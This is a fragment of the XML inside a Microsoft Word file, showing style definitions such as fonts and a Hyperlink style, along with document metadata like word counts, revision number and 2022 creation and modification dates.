      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/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20F87"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi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20F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0F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0D7E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0D7E08"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi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278B"/>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C3278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73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308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4D06-7949-4A79-A410-61ED91F1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7</Pages>
  <Words>1007</Words>
  <Characters>5743</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>47</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>P R C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53</cp:lastModifiedBy>
  <cp:revision>166</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-13T02:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-06T11:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>